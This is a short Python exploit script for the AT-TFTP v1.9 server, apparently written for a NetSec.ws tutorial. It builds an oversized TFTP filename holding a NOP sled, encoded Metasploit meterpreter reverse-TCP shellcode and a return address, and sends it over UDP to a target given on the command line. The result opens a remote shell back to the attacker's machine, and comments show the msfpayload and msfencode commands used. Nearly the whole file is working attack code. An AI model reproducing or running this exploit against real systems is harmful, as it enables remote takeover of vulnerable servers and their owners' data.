attftp_long_filename.py

# AT-TFTP v1.9 Exploit
# Written for NetSec.ws http://netsec.ws/?p=262
 
import sys, socket
 
# Use in the form "python attftp_long_filename.py <Target IP Address> <Port> <Your IP Address>"
 
host = sys.argv[1]		# Recieve IP from user
lhost = sys.argv[3]
port = int(sys.argv[2])		# Recieve Port from user
 
ret = "\x53\x93\x42\x7e" 	# Return address - Source Metasploit (Little Endian)
nop = "\x90" * (25-len(lhost))	# Create a NOP string as to bring NOPs + LHOST up to 25 bytes
 
#msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=192.168.1.2 LPORT=443 EXITFUNC=process R > payload
#cat shellcode | msfencode -b '\x00' -e x86/shaikata_ga_nai -t python
#[*] x86/shikata_ga_nai succeeded with size 210 (iteration=1)
 
buf =  ""
buf += "\xbb\xd2\x8c\x3a\x78\xdb\xd2\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x2e\x31\x58\x15\x03\x58\x15\x83\xc0\x04\xe2"
buf += "\x27\x0d\xd6\xd4\xca\x0e\x27\xd9\xbe\xe5\x60\xc9\xc7"
buf += "\x05\x91\xf6\x57\xcb\xb5\x82\xea\x17\xc1\xe9\x29\x10"
buf += "\xd4\xfe\xda\xb7\xf6\x01\x36\xbc\xc3\x9b\xc7\x2d\x1a"
buf += "\x5c\x5e\x1d\x9c\x96\x6d\x5f\xdd\xa3\xad\x2a\x17\xe8"
buf += "\x4b\xec\x1d\x9a\x70\x45\x29\x2a\x52\x5b\xc4\xd3\x11"
buf += "\x47\x4f\x97\x6a\x64\x6e\x4e\x77\xb8\xe9\x19\x1b\xe4"
buf += "\x15\x7b\x1c\x04\x14\xa0\x86\x4e\x14\x66\xcd\x11\x97"
buf += "\x0d\xa1\x8d\x0a\x9a\x29\xa6\x0a\xfb\xfa\xd0\xda\x30"
buf += "\xce\x74\x6c\x44\x1c\xda\xc6\xcc\xd9\x96\x86\xef\xcf"
buf += "\xc2\x14\x43\xbc\xbf\xd9\x30\x01\x13\x57\x51\xe3\x12"
buf += "\x88\x96\xe9\x43\x04\xc1\x54\x8c\x75\xf2\x70\x35\x33"
buf += "\xa5\x13\x45\x95\x21\x83\x79\xb2\x4f\x51\x1c\xab\x4e"
buf += "\xee\x86\x78\xd8\xf3\x2d\x6f\x89\xa4\xd7\x36\x7a\x4f"
buf += "\xe7\x9f\xd5\xfb\x1b\x70\x85\x54\x77\x16\x90\x9a\x4f"
buf += "\x29\x04"
 
exploit = "\x00\x02" + nop + buf + ret + "\x83\xc4\x28\xc3\x00netascii\x00" 	# Our exploit
 
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)	# Declare a UDP socket
client.sendto(exploit, (host, port))				# Send the exploit over UDP to the nominated addressess